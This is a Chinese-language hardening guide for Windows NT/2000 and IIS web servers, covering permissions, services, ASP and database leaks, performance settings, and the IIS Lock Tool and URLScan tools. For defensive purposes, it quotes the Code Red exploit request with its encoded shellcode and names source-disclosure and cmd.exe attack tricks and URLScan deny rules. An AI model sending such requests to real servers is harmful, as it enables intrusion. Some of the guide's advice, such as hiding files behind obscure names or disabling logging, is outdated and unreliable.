10.为了控制好服务器上用户的权限,同时也为了预防以后可能的入侵和溢出,NT的访问权限分为:读取、写入、读取及执行、修改、列目录、完全控制。在默认的情况下,大多数的文件夹对所有用户(Everyone这个组)是完全敞开的(Full Control),你需要根据应用的需要进行权限重设。
在进行权限控制时,请记住以下几个原则:
1>限是累计的:如果一个用户同时属于两个组,那么他就有了这两个组所允许的所有权限;
2>拒绝的权限要比允许的权限高(拒绝策略会先执行)如果一个用户属于一个被拒绝访问某个资源的组,那么不管其他的权限设置给他开放了多少权限,他也一定不能访问这个资源。所以请非常小心地使用拒绝,任何一个不当的拒绝都有可能造成系统无法正常运行;
3>文件权限比文件夹权限高
4>利用用户组来进行权限控制是一个成熟的系统管理员必须具有的优良习惯之一;
5>仅给用户真正需要的权限,权限的最小化原则是安全的重要保障;
11.只安装一种操作系统;
说明:安装两种以上操作系统,会给黑客以可乘之机,利用攻击使系统重启到另外一个没有安全设置的操作系统(或者他熟悉的操作系统),进而进行破坏。
12.安装成独立的域控制器(Stand Alone),选择工作组成员,不选择域;
说明:主域控制器(PDC)是局域网中队多台联网机器管理的一种方式,用于网站服务器包含着安全隐患,使黑客有可能利用域方式的漏洞攻击站点服务器。
13.将操作系统文件所在分区与WEB数据包括其他应用程序所在的分区分开,并在安装时最好不要使用系统默认的目录,如将\WINNT改为其他目录;
说明:黑客有可能通过WEB站点的漏洞得到操作系统对操作系统某些程序的执行权限,从而造成更大的破坏。同时如果采用IIS的话你应该在其设置中删除掉所有的无用的映射,同时不要安装索引服务,远程站点管理与服务器扩展最好也不要要,然后删掉默认路径下的www,整个删,不要手软,然后再硬盘的另一个硬盘建立存放你网站的文件夹,同时一定记得打开w3c日志纪录,切记(不过本人建议采用apache 1.3.24)
系统安装过程中一定本着最小服务原则,无用的服务一概不选择,达到系统的最小安装,多一个服务,多一份风险,呵呵,所以无用组件千万不要安装!
14.关于补丁:在NT下,如果安装了补丁程序,以后如果要从NT光盘上安装新的Windows程序,都要重新安装一次补丁程序, 2000下不需要这样做。
说明:
最新的补丁程序,表示系统以前有重大漏洞,非补不可了,对于局域网内服务器可以不是最新的,但站点必须安装最新补丁,否则黑客可能会利用低版本补丁的漏洞对系统造成威胁。这是一部分管理员较易忽视的一点;
安装NT的SP5、SP6有一个潜在威胁,就是一旦系统崩溃重装NT时,系统将不会认NTFS分区,原因是微软在这两个补丁中对NTFS做了改进。只能通过Windows 2000安装过程中认NTFS,这样会造成很多麻烦,建议同时做好数据备份工作。
安装Service Pack前应先在测试机器上安装一次,以防因为例外原因导致机器死机,同时做好数据备份。
尽量不安装与WEB站点服务无关的软件;
说明:其他应用软件有可能存在黑客熟知的安全漏洞。
15.解除NetBios与TCP/IP协议的绑定
说明:NetBois在局域网内是不可缺少的功能,在网站服务器上却成了黑客扫描工具的首选目标。方法:NT:控制面版——网络——绑定——NetBios接口——禁用 2000:控制面版——网络和拨号连接——本地网络——属性——TCP/IP——属性——高级——WINS——禁用TCP/IP上的NETBIOS
16.删除所有的网络共享资源,在网络连接的设置中删除文件和打印共享,只留下TCP/IP协议
说明:2000在默认情况下有不少网络共享资源,在局域网内对网络管理和网络通讯有用,在网站服务器上同样是一个特大的安全隐患。(卸载“Microsoft 网络的文件和打印机共享”。当查看“网络和拨号连接”中的任何连接属性时,将显示该选项。单击“卸载”按钮删除该组件;清除“Microsoft 网络的文件和打印机共享”复选框将不起作用。)
方法:
1>2000:控制面版——管理工具——计算及管理——共享文件夹———停止共享
但上述方法太麻烦,服务器每重启一次,管理员就必须停止一次
2>修改注册表:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters下增加一个键
Name: AutoShareServer
Type: REG_DWORD
value: 0
然后重新启动您的服务器,磁盘分区共享去掉,但IPC共享仍存在,需每次重启后手工删除。
17.改NTFS的安全权限;
说明:NTFS下所有文件默认情况下对所有人(EveryOne)为完全控制权限,这使黑客有可能使用一般用户身份对文件做增加、删除、执行等操作,建议对一般用户只给予读取权限,而只给管理员和System以完全控制权限,但这样做有可能使某些正常的脚本程序不能执行,或者某些需要写的操作不能完成,这时需要对这些文件所在的文件夹权限进行更改,建议在做更改前先在测试机器上作测试,然后慎重更改。
18.加强数据备份;
说明:这一点非常重要,站点的核心是数据,数据一旦遭到破坏后果不堪设想,而这往往是黑客们真正关心的东西;遗憾的是,不少网管在这一点上作的并不好,不是备份不完全,就是备份不及时。数据备份需要仔细计划,制定出一个策略并作了测试以后才实施,而且随着网站的更新,备份计划也需要不断地调整。
19.只保留TCP/IP协议,删除NETBEUI、IPX/SPX协议;
说明:网站需要的通讯协议只有TCP/IP,而NETBEUI是一个只能用于局域网的协议,IPX/SPX是面临淘汰的协议,放在网站上没有任何用处,反而会被某些黑客工具利用。
20.不要起用IP转发功能,控制面板->网络->协议->TCP/IP协议->属性,使这个选框为空。(NT)
说明:缺省情况下,NT的IP转发功能是禁止的,但注意不要启用,否则它会具有路由作用,被黑客利用来对其他服务器进行攻击。
21.安装最新的MDAC(http://www.microsoft.com/data/download.htm)
说明:MDAC为数据访问部件,通常程序对数据库的访问都通过它,但它也是黑客攻击的目标,为防止以前版本的漏洞可能会被带入升级后的版本,建议卸载后安装最新的版本。注意:在安装最新版本前最好先做一下测试,因为有的数据访问方式或许在新版本中不再被支持,这种情况下可以通过修改注册表来档漏洞,祥见漏洞测试文档。
22.设置IP拒绝访问列表
说明:对于WWW服务,可以拒绝一些对站点有攻击嫌疑的地址;尤其对于FTP服务,如果只是自己公司上传文件,就可以只允许本公司的IP访问改FTP服务,这样,安全性大为提高。
23.禁止对FTP服务的匿名访问
说明:如果允许对FTP服务做匿名访问,该匿名帐户就有可能被利用来获取更多的信息,以致对系统造成危害。
24.建议使用W3C扩充日志文件格式,每天记录客户IP地址,用户名,服务器端口,方法,URI字根,HTTP状态,用户代理,而且每天均要审查日志。(最好不要使用缺省的目录,建议更换一个记日志的路径,同时设置日志的访问权限,只允许管理员和system为Full Control)
说明:作为一个重要措施,既可以发现攻击的迹象,采取预防措施,也可以作为受攻击的一个证据。
25.慎重设置WEB站点目录的访问权限,一般情况下,不要给予目录以写入和允许目录浏览权限。只给予.ASP文件目录以脚本的权限,而不要给与执行权限。
说明:目录访问权限必须慎重设置,否则会被黑客利用。
免。
26.涉及用户名与口令的程序最好封装在服务器端,尽量少的在ASP文件里出现,涉及到与数据库连接地用户名与口令应给予最小的权限。
说明:用户名与口令,往往是黑客们最感兴趣的东西,如果被通过某种方式看到源代码,后果是严重的。因此要尽量减少它们在ASP文件中的出现次数。出现次数多得用户名与口令可以写在一个位置比较隐蔽的包含文件中。如果涉及到与数据库连接,理想状态下只给它以执行存储过程的权限,千万不要直接给予该用户以修改、插入、删除记录的权限。
27.需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。
说明:现在的需要经过验证的ASP程序多是在页面头部加一个判断语句,但这还不够,有可能被黑客绕过验证直接进入,因此有必要跟踪上一个页面。具体漏洞见所附漏洞文档。
28.防止ASP主页.inc文件泄露问题
当存在asp 的主页正在制作并没有进行最后调试完成以前,可以被某些搜索引擎机动追加为搜索对象,如果这时候有人利用搜索引擎对这些网页进行查找,会得到有关文件的定位,并能在浏览器中察看到数据库地点和结构的细节揭示完整的源代码。
解决方案:应该在网页发布前对其进行彻底的调试;安全专家需要固定asp 包含文件以便外部的用户不能看他们。 首先对 .inc 文件内容进行加密,其次也可以使用 .asp 文件代替 .inc 文件使用户无法从浏览器直接观看文件的源代码。.inc 文件的文件名不用使用系统默认的或者有特殊含义容易被用户猜测到的,尽量使用无规则的英文字母。
29.注意某些ASP编辑器会自动备份asp文件,会被下载的漏洞
在有些编辑asp程序的工具,当创建或者修改一个asp文件时,编辑器自动创建一个备份文件,比如:UltraEdit就会备份一个..bak文件,如你创建或者修改了some.asp,编辑器自动生成一个叫some.asp.bak文件,如果你没有删除这个 bak文件,攻击有可以直接下载some.asp.bak文件,这样some.asp的源程序就会给下载。
在处理类似留言板、BBS等输入框的ASP程序中,最好屏蔽掉HTML、j avascript、VBScript语句,如无特殊要求,可以限定只允许输入字母与数字,屏蔽掉特殊字符。同时对输入字符的长度进行限制。而且不但在客户端进行输入合法性检查,同时要在服务器端程序中进行类似检查。
说明:输入框是黑客利用的一个目标,他们可以通过输入脚本语言等对用户客户端造成损坏; 如果该输入框涉及到数据查询,他们会利用特殊查询输入得到更多的数据库数据,甚至是表的全部。因此必须对输入框进行过滤。但如果为了提高效率仅在客户端进行输入合法性检查,仍有可能被绕过,因此必须在服务器端再做一次检查。
30.防止ACCESS mdb 数据库有可能被下载的漏洞
在用ACCESS做后台数据库时,如果有人通过各种方法知道或者猜到了服务器的ACCESS数据库的路径和数据库名称,那么他能够下载这个ACCESS数据库文件,这是非常危险的。
解决方法:
1>为你的数据库文件名称起个复杂的非常规的名字,并把他放在几目录下。所谓 "非常规", 打个比方: 比如有个数据库要保存的是有关书籍的信息, 可不要把他起个"book.mdb"的名字,起个怪怪的名称,比如d34ksfslf.mdb, 再把他放在如./kdslf/i44/studi/ 的几层目录下,这样黑客要想通过猜的方式得到你的ACCESS数据库文件就难上加难了。
2>不要把数据库名写在程序中。有些人喜欢把DSN写在程序中,比如:
DBPath = Server.MapPath("cmddb.mdb")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
假如万一给人拿到了源程序,你的ACCESS数据库的名字就一览无余。因此建议你在ODBC里设置数据源,再在程序中这样写:
conn.open "shujiyuan"
3>使用ACCESS来为数据库文件编码及加密。首先在选取 "工具->安全->加密/解密数据库,选取数据库(如:employer.mdb),然后接确定,接着会出现 "数据库加密后另存为"的窗口,存为:employer1.mdb。 接着employer.mdb就会被编码,然后存为employer1.mdb..
要注意的是,以上的动作并不是对数据库设置密码,而只是对数据库文件加以编码,目的是为了防止他人使用别的工具来查看数据库文件的内容。
接下来我们为数据库加密,首先以打开经过编码了的 employer1.mdb, 在打开时,选择"独占"方式。然后选取功能表的"工具->安全->设置数据库密码", 接着 输入密码即可。这样即使他人得到了employer1.mdb文件,没有密码他是无法看到 employer1.mdb的。
31.SQL SERVER是NT平台上用的最多的数据库系统,但是它的安全问题也必须引起重视。数据库中往往存在着最有价值的信息,一旦数据被窃后果不堪设想。
及时更新补丁程序。
说明:与NT一样,SQL SERVER的许多漏洞会由补丁程序来弥补。建议在安装补丁程序之前先在测试机器上做测试,同时提前做好目标服务器的数据备份。
给SA一个复杂的口令。
说明:SA具有对SQL SERVER数据库操作的全部权限。遗憾的是,一部分网管对数据库并不熟悉,建立数据库的工作由编程人员完成,而这部分人员往往只注重编写SQL 语句本身,对SQL SERVER数据库的管理不熟悉,这样很有可能造成SA口令为空。这对数据库安全是一个严重威胁。目前具有这种隐患的站点不在少数。
严格控制数据库用户的权限,轻易不要给让用户对表有直接的查询、更改、插入、删除权限,可以通过给用户以访问视图的权限,以及只具有执行存储过程的权限。
说明:用户如果对表有直接的操作权限,就会存在数据被破坏的危险。
制订完整的数据库备份与恢复策略。
32.目前,PCANYWHERE是最流行的基于2000的远程控制工具,同样也需要注意安全问题。
建议采用单独的用户名与口令,最好采用加密手段。千万不要采用与NT管理员一样的用户名与口令,也不要使用与NT集成的口令。同时在服务器端的设置时务必采用security options中的强加密方式,拒绝低加密水平的连接,同时采用口令加密与传输过程中的用户名与口令加密,以防止被嗅探到,还要限制连接次数,另外很重要的一点就是一定在protect item中设置高强度的口令,同时一定限制不能够让别人看到你的host端的任何设置,即便是要察看主机端的相关设置也必须要输入口令!
说明:PCANYWHERE 口令是远程控制的第一个关口,如果与NT的一样, 就失去了安全屏障。被攻破后就毫无安全可言。而如果采用单独的口令,即使攻破了PCANYWHERE,NT还有一个口令屏障。
及时安装较新的版本。
33.实际上,安全和应用在很多时候是矛盾的,因此,你需要在其中找到平衡点,毕竟服务器是给用户用而不是做OPEN HACK的,如果安全原则妨碍了系统应用,那么这个安全原则也不是一个好的原则。 网络安全是一项系统工程,它不仅有空间的跨度,还有时间的跨度。很多朋友(包括部分系统管理员)认为进行了安全配置的主机就是安全的,其实这其中有个误区:我只能说一台主机在一定的情况一定的时间上是安全的随着网络结构的变化、新的漏洞的发现,管理员/用户的操作,主机的安全状况是随时随地变化着的,只有让安全意识和安全制度贯穿整个过程才能做到真正的安全。
提高IIS 5.0网站伺服器的执行效率的八种方法
以下是提高IIS 5.0网站伺服器的执行效率的八种方法:
1. 启用HTTP的持续作用可以改善15~20%的执行效率。
2. 不启用记录可以改善5~8%的执行效率。
3. 使用 [独立] 的处理程序会损失20%的执行效率。
4. 增加快取记忆体的保存档案数量,可提高Active Server Pages之效能。
5. 勿使用CGI程式。
6. 增加IIS 5.0电脑CPU数量。
7. 勿启用ASP侦错功能。
8. 静态网页采用HTTP 压缩,大约可以减少20%的传输量。
34.启用HTTP的持续作用(Keep-Alive)时,IIS与浏览器的连线不会断线,可以改善执行效率,直到浏览器关闭时连线才会断线。因为维持「Keep-Alive」状态时,於每次用户端请求时都不须重新建立一个新的连接,所以将改善伺服器的效率。此功能为HTTP1.1预设的功能,HTTP 1.0加上Keep-Alive header也可以提供HTTP的持续作用功能。
启用HTTP的持续作用可以改善15~20%的执行效率。
如何启用HTTP的持续作用呢?步骤如下:在 [Internet服务管理员] 中,选取整个IIS电脑、或Web站台,於 [内容] 之 [主目录] 页,勾选 [HTTP的持续作用] 选项。
35.不启用记录可以改善5~8%的执行效率。如何设定不启用记录呢?步骤如下:
在 [Internet服务管理员] 中,选取整个IIS电脑、或Web站台,於 [内容] 之 [主目录] 页,不勾选 [启用记录] 选项。设定非独立的处理程序使用 [独立] 的处理程序会损失20%的执行效率,此处所谓 独立」系指将 [主目录]、[虚拟目录] 页之应用程式保护选项设定为 [高(独立的)] 时。因此 [应用程式保护] 设定为 [低 (IIS处理程序)] 时执行效率较高如何设定非「独立」的处理程序呢?步骤如下: 在 [Internet服务管理员] 中,选取整个IIS电脑、Web站台、或应用程式的起始目录。於 [内容] 之 [主目录]、[虚拟目录] 页,设定应用程式保护选项为 [低 (IIS处理程序)] 。
36.IIS 5.0将静态的网页资料暂存於快取(Cache)记忆体当中;IIS 4.0则将静态的网页资料暂存於档案当中。调整快取(Cache)记忆体的保存档案数量可以改善执行效率。ASP指令档案执行过後,会在暂存於快取(Cache)记忆体中以提高执行效能。增加快取记忆体的保存档案数量,可提高Active Server Pages之效能。可以设定所有在整个IIS电脑、「独立」Web站台、或「独立」应用程式上执行之应用程式的快取记忆体档案数量。如何设定快取(Cache)功能呢?步骤如下:在 [Internet服务管理员] 中选取整个IIS电脑、「独立」Web站台、或「独立」应用程式的起始目录。於 [内容] 之 [主目录]、[虚拟目录] 页,按下 [设定] 按钮时,即可由 [处理程序选项] 页设定[指令档快取记忆体] 。如何设定快取(Cache)记忆体档案数量呢?步骤如下:在[Internet服务管理员] 中,选取整个IIS电脑、或Web站台的起始目录。於 [内容] 之[伺服器扩充程式] 页,按下 [设定] 按钮。即可设定快取(Cache)记忆体档案数量。
37.使用CGI程式时,因为处理程序(Process)须不断地产生与摧毁,造成执行效率不佳。一般而言,执行效率比较如下: 静态网页(Static):100 ISAPI:50 ASP:10 CGI:1 换句话说,ASP比CGI可能快10倍,因此勿使用CGI程式可以改善IIS的执行效率。以弹性(Flexibility)而言:ASP > CGI > ISAPI > 静态网页(Static)。以安全(Security)而言:ASP(独立) = ISAPI(独立)= CGI > ASP(非独立) = ISAPI(非独立)= 静态网页(Static)
38.根据微软的测试报告,增加IIS 4.0电脑CPU数量,执行效率并不会改善多少;但是增加IIS 5.0电脑CPU数量,执行效率会几乎成正比地提供,换句话说,两颗CPU的IIS5.0电脑执行效率几乎是一颗CPU电脑的两倍,四颗CPU的IIS 5.0电脑执行效率几乎是一颗CPU电脑的四倍IIS 5.0将静态的网页资料暂存於快取(Cache)记忆体当中;IIS 4.0 则将静态的网页资料暂存於档案当中。调整快取(Cache)记忆体的保存档案数量可以改善执行效率。
39.勿启用ASP侦错功能可以改善执行效率。如何勿启用ASP侦错功能呢?步骤如下:於[Internet服务管理员] 中,选取Web站台、或应用程式的起始目录,按右键选择[内容],按 [主目录]、[虚拟目录] 或 [目录] 页,按下 [设定] 按钮,选择 [应用程式侦错] 页,不勾选 [启用ASP伺服器端指令侦错]、[启用ASP用户端指令侦错] 选项。
40.静态网页采用HTTP 压缩,大约可以减少20%的传输量。HTTP压缩功能启用或关闭,系针对整台IIS伺服器来设定。用户端使用IE 5.0浏览器连线到已经启用HTTP压缩IIS5.0之Web伺服器,才有HTTP压缩功能。如何启用HTTP压缩功能呢?步骤如下:若要启用HTTP 压缩功能,方法为在 [Internet服务管理员] 中,选取电脑之 [内容],於 [主要内容] 之下选取 [WWW服务]。然後按一下 [编辑] 按钮,於 [服务] 页上,选取 [压缩静态档案] 可以压缩静态档案,不选取 [压缩应用程式档案] 。 动态产生的内容档案(压缩应用程式档案)也可以压缩,但是须耗费额外CPU处理时间,若%Processor Time已经百分之八十或更多时,建议不要压缩
以上是对采用IIS作为WEB服务器的一些安全相关的设置与其性能调整的参数设置,可以最大化的优化你的IIS,不过个人认为如果不存在障碍,还是采用apache比较好一些,漏洞少,建议采用apache 1.3.24版本,因为最近经测试,apache 1.3.23之前的版本都存在溢出漏洞,不要怕,这种漏洞很少的,呵呵。另外,个人建议不要采用ASP安全性总不叫人放心,个人认为还是采用JSP好一些,安全性好,功能强大,绝对超值,呵呵,因为PHP也存在不少的洞洞
############################################################################################
附:IIS安全工具及其使用说明
一、IIS Lock Tool,快速设置IIS安全属性
IIS Lock Tool的推出,还要感谢红色代码,因为正是红色代码的大面积传播,致使微软设计发布这款帮助管理员们设置IIS安全性的工具。
(一)、IIS Lock Tool具有以下功能和特点
1、最基本功能,帮助管理员设置IIS安全性;
2、此工具可以在IIS4和IIS5上使用;
3、即使系统没有及时安装所有补丁,也能有效防止IIS4和IIS5的已知漏洞;
4、帮助管理员去掉对本网站不必要的一些服务,使IIS在满足本网站需求的情况下运行最少的服务;
5、具有两种使用模式:快捷模式和高级模式。快捷模式直接帮助管理员设置好IIS安全性,这种模式只适合于只有HTML和HTM静态网页的网站使用,因为设置完成以后,ASP不能运行;高级模式允许管理员自己设置各种属性,设置得当,对IIS系统任何功能均没有影响。
(二)、IIS Lock Tool的使用
1、软件下载和安装
IIS Lock Tool在微软网站下载,下载地址:
http://www.microsoft.com/Downloads/...ReleaseID=32362
安装很简单,需要注意的是,安装以后,程序不会在系统的【程序】菜单出现,也不会在【管理工具】出现,需要安装者在安装目录寻找运行该程序。
2、软件的使用
在以下的介绍中,我们将详细介绍每一步设置的意义和推荐设置,之所以详细介绍,是为了我们明白这些设置到底意味着什么,同时,和我们原来的安全设置相对照,避免出现设置完成以后,系统出现.
以上界面介绍了IIS Lock Tool的一些基本情况和使用时需要注意的地方:1)使用时应该选择针对本网站最少的服务,去掉不必要的服务;2)设置完成以后,建议对网站进行彻底检查,以确定设置对本网站是否合适;
在以上,点击【下一步】按钮
以上选择快捷模式还是高级模式来运行软件,在这里,软件介绍了两者模式的区别:
快捷模式:此设置模式关闭了IIS的一些高级服务属性,其中包括动态网页属性(ASP);所以,我们需要再重复一遍,选择快捷模式只适合提供静态页面的网站,当然,这种模式是相对最安全的。
高级模式:此模式运行安装者自定义各种属性,同时允许高级属性的运行。
快捷模式设置我们不必介绍,点击【下一步】按钮就可以设置完成。我们选择【Advanced Lockdown】(高级设置),点击【下一步】按钮
以上帮助管理员设置各种脚本映射,我们来看每一种映射应该怎样设置:
1)Disable support Active Server Pages(ASP),选择这种设置将使IIS不支持ASP功能;可以根据网站具体情况选择,一般不选择此项,因为网站一般要求运行ASP程序;
2)Disable support Index Server Web Interface(.idq,.htw,.ida),选择这一项将不支持索引服务,具体就是不支持.idq,.htw,.ida这些文件。我们先来看看到底什么是索引服务,然后来决定取舍。索引服务是IIS4中包含的内容索引引擎。你可以对它进行ADO调用并搜索你的站点,它为你提供了一个很好的web 搜索引擎。如果你的网站没有利用索引服务对网站进行全文检索,也就可以取消网站的这个功能,取消的好处是:1)减轻系统负担;2)有效防止利用索引服务漏洞的病毒和黑客,因为索引服务器漏洞可能使攻击者控制网站服务器,同时,暴露网页文件在服务器上的物理位置(利用.ida、.idq)。因此,我们一般建议在这一项前面打勾,也就是取消索引服务;
3)Disable support for Server Side Includes(.shtml,.shtm,.stm),取消服务器端包含;先来看看什么叫服务器端包含,SSI就是HTML文件中,可以通过注释行调用的命令或指针。SSI 具有强大的功能,只要使用一条简单的SSI 命令就可以实现整个网站的内容更新,动态显示时间和日期,以及执行shell和CGI脚本程序等复杂的功能。一般而言,我们没有用到这个功能,所以,建议取消;取消可以防止一些IIS潜在地漏洞;
4)Disable for Internet Data Connector(.idc),取消Internet数据库连接;先看Internet数据库连接的作用,它允许HTML页面和后台数据库建立连接,实现动态页面。需要注意的是,IIS4和IIS5中基本已经不使用idc,所以,建议在此项打勾,取消idc;
5)Disable support for Internet Printing (.printer),取消Internet打印;这一功能我们一般没有使用,建议取消;取消的好处是可以避免.printer远程缓存溢出漏洞,这个漏洞使攻击者可以利用这个漏洞远程入侵IIS 服务器,并以系统管理员(system)身份执行任意命令;
6)Disable support for .HTR Scripting(.htr),取消htr映射;攻击者通过htr构造特殊的URL请求,可能导致网站部分文件源代码暴露(包括ASP),建议在此项前面打勾,取消映射;
理解以上各项设置以后,我们可以根据本网站情况来决定取舍,一般网站除了ASP要求保留以外,其他均可以取消,也就是全消第一项前面的勾,其他全部打勾,按【下一步】按钮
以上设置可以让管理员选择一些IIS默认安装文件的保留与否,我们来看怎样选择:
1)Remove sample web files,删除web例子文件;建议删除,因为一般我们不需要在服务器上阅读这些文件,而且,这些文件可能让攻击者利用来阅读部分网页源程序代码(包括ASP);
2)Remove the Scripts vitual directory,删除脚本虚拟目录;建议删除;
3)Remove the MSDAC virtual directory,删除MSDAC虚拟目录,建议删除;
4)Disable Distribauted Authoring and Versioning(WebDAV),删除WEBDAV,WebDav主要允许管理者远程编写和修改页面,一般我们不会用到,建议删除,删除的好处是可以避免IIS5的一个WebDav漏洞,该漏洞可能导致服务器停止。
5)Set file permissions to prevent the IIS anouymous user from executing system utilities(such as cmd.exe,tftp.exe),防止匿名用户运行可执行文件,比如cmd.exe和tftp.exe;建议选择此项,因为红色代码和尼姆达均利用了以上所说的匿名执行可执行文件的功能;
6)Set file permissions to prevent the IIS anouymous user from writing to content directories,防止匿名用户对目录具有写权限,这个不要解释,建议选择;
设置以上选项以后,按【下一步】按钮
要求确认是否接受以上设置,选择【是】,开始对系统执行设置:
在以上中,我们可以看到对IIS的详细设置情况。设置完成以后,建议重新启动IIS。
############################################################################################
41.仔细观察IIS的漏洞,我们几乎可以得出这样一个结论,所有利用这些漏洞实现对网站攻击的手段均是构造特殊的URL来访问网站,一般有以下几种类型的URL可以利用漏洞:
1、特别长的URL,比如红色代码攻击网站的URL就是这样:
GET/default.idaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u
9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u
00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200;
2、特殊字符或者字符串的URL,比如在URL后面加::$DATA可以看到网页(ASP)源代码;
3、URL中含有可执行文件名,最常见的就是有cmd.exe;
既然这些攻击利用特殊的URL来实现,所以,微软提供了这款专门过滤非法URL的安全工具,可以达到御敌于国门之外的效果,这款工具有以下特点和功能:
1、基本功能:过滤非法URL请求;
2、设定规则,辨别那些URL请求是合法的;这样,就可以针对本网站来制定专门的URL请求规则;同时,当有新的漏洞出现时,可以更改这个规则,达到防御新漏洞的效果;
3、程序提供一套URL请求规则,这个规则包含已经发现的漏洞利用特征,帮助管理员设置规则;
42.URLScan可以在微软的网站上下载,地址如下:
http://download.microsoft.com/downl...-US/UrlScan.exe
和一般软件一样安装,但是,此软件不能选择安装路径,安装完成以后,我们可以在System32/InetSvr/URLScan目录下找到以下文件:
urlscan.dll:动态连接库文件;
urlscan.inf:安装信息文件;
urlscan.txt:软件说明文件;
urlscan.ini:软件配置文件,这个文件很只要,因为对URLScan的所有配置,均有这个文件来完成。
43.软件的配置由urlscan.ini文件来完成,在配置此文件以前,我们需要了解一些基本知识。
1、urlscan配置文件的构造形式
urlscan配置文件必须遵从以下规则:
(1)此文件名必须为urlscan.ini;
(2)配置文件必须和urlscan.dll在同一目录;
(3)配置文件必须是标准ini文件结构,也就是由节,串和值组成;
(4)配置文件修改以后,必须重新启动IIS,使配置生效;
(5)配置文件由以下各节组成:
[Option]节,主要设置节;
[AllowVerbs]节,配置认定为合法URL规则设定,此设定与Option节有关;
[DenyVerbs]节,配置认定为非法URL规则设定,此设定与Option节有关;
[DenyHeaders]节,配置认定为非法的header在设立设置;
[AllowExtensions]节,配置认定为合法的文件扩展名在这里设置,此设定与Option节有关;
[DenyExtensions]节,配置认定为非法的文件扩展名在这里设置,此设定与Option节有关;
2、具体配置
(1)Option节的配置,因为Option节的设置直接影响到以后的配置,因此,这一节的设置特别重要。此节主要进行以下属性的设置:
UseAllowVerbs:使用允许模式检查URL请求,如果设置为1,所有没有在[AllowVerbs]节设置的请求都被拒绝;如果设置为0,所有没有在[DenyVerbs]设置的URL请求都认为合法;默认为1;
UseAllowExtensions:使用允许模式检测文件扩展名;如果设置为 1,所有没在[AllowExtensions]节设置的文件扩展名均认为是非法请求;如果设置为0,所有没在[DenyExtensions]节设置的扩展名均被认为是合法请求;默认为0;
EnableLogging:是否允许使用Log文件,如果为1,将在urlscan.dll的相同目录设置名为urlscan.log的文件记录所有过滤;
AllowLateScanning:允许其他URL过滤在URLScan过滤之前进行,系统默认为不允许0;
AlternateServerName:使用服务名代替;如果此节存在而且[RemoveServerHeader]节设置为0,IIS将在这里设置的服务器名代替默认的“Server”;
NormalizeUrlBeforeScan:在检测URL之前规格化URL;如果为1,URLScan将在IIS编码URL之前URL进行检测;需要提醒的是,只有管理员对URL解析非常熟悉的情况下才可以将其设置为0;默认为1;
VerifyNormalization:如果设置为1,UrlScan将校验URL规则,默认为1;此节设定与NormalizeUrlBeforeScan有关;
AllowHighBitCharacters:如果设置为1,将允许URL中存在所有字节,如果为0,含有非ASCII字符的URL将拒绝;默认为1;
AllowDotInPath:如果设置为1,将拒绝所有含有多个“.”的URL请求,由于URL检测在IIS解析URL之前,所以,对这一检测的准确性不能保证,默认为0;
RemoveServerHeader:如果设置为1,将把所有应答的服务头清除,默认为0;
(2)[AllowVerbs]节配置
如果UseAllowVerbs设置为1,此节设置的所有请求将被允许,一般设置以下请求:
GET、HEAD、POST
(3)[DenyVerbs]节配置
如果UseAllowVerbs设置为0,此节设置的所有请求将拒绝,一般设置以下请求:
PROPFIND、PROPPATCH、MKCOL、DELETE、PUT、COPY、MOVE、LOCK、UNLOCK
(4)[AllowExtensions]节设置
在这一节设置的所有扩展名文件将被允许请求,一般设置以下请求:
.asp、.htm、.html、.txt、.jpg、.jpeg、.gif,如果需要提供文件下载服务,需要增加.rar、.zip
(5)[DenyExtensions]节设置
在这一节设置的所有扩展名文件请求将被拒绝,根据已经发现的漏洞,我们可以在这一节增加内容,一般为以下设置:
.asa、可执行文件、批处理文件、日志文件、罕见扩展如:shtml、.printer等。
44.以上两个工具功能强大,可以真正实现对IIS的保护。IIS Lock Tool简单,相对而言,只是被动的防卫;UrlScan设置比较难,建议对IIS非常熟悉的管理员使用,只要设置得当,UrlScan的功能更加强大。在使用UrlScan的时候,切记不要设置一次万事大吉,需要不停跟踪新出现的漏洞,随时修改URLScan的配置文件。
45.Win2000的默认安装允许任何用户通过空用户得到系统所有账号/共享列表,这个本来是为了方便局域网用户共享文件的,但是一个远程用户也可以得到你的用户列表并使用暴力法破解用户密码。很多朋友都知道可以通过更改注册表Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous = 1来禁止139空连接,实际上win2000的本地安全策略(如果是域服务器就是在域服务器安全和域安全策略中)就有这样的选项RestrictAnonymous(匿名连接的额外限制),这个选项有三个值: 0:None. Rely on default permissions(无,取决于默认的权限 1 :Do not allow enumeration of SAM accounts and shares(不允许枚举SAM帐号和共享) 2:No access without explicit anonymous permissions(没有显式匿名权限就不允许访问) 0这个值是系统默认的,什么限制都没有,远程用户可以知道你机器上所有的账号、组信息、共享目录、网络传输列表(NetServerTransportEnum等等,对服务器来说这样的设置非常危险。 1这个值是只允许非NULL用户存取SAM账号信息和共享信息。 2这个值是在win2000中才支持的,需要注意的是,如果你一旦使用了这个值,你的共享估计就全部完蛋了,所以我推荐你还是设为1比较好。 好了,入侵者现在没有办法拿到我们的用户列表,我们的账户安全了
46.禁止显示上次登陆的用户名HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\winlogon项中的Don’t Display Last User Name串数据改成1,这样系统不会自动显示上次的登录用户名。将服务器注册表HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\
WindowsNT\CurrentVersion\Winlogon项中的Don't Display Last User Name串数据修改为1,隐藏上次登陆控制台的用户名。其实,在2000的本地安全策略中也存在该选项
Winnt4.0修改注册表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Current Version\Winlogon 中增加DontDisplayLastUserName,将其值设为1。
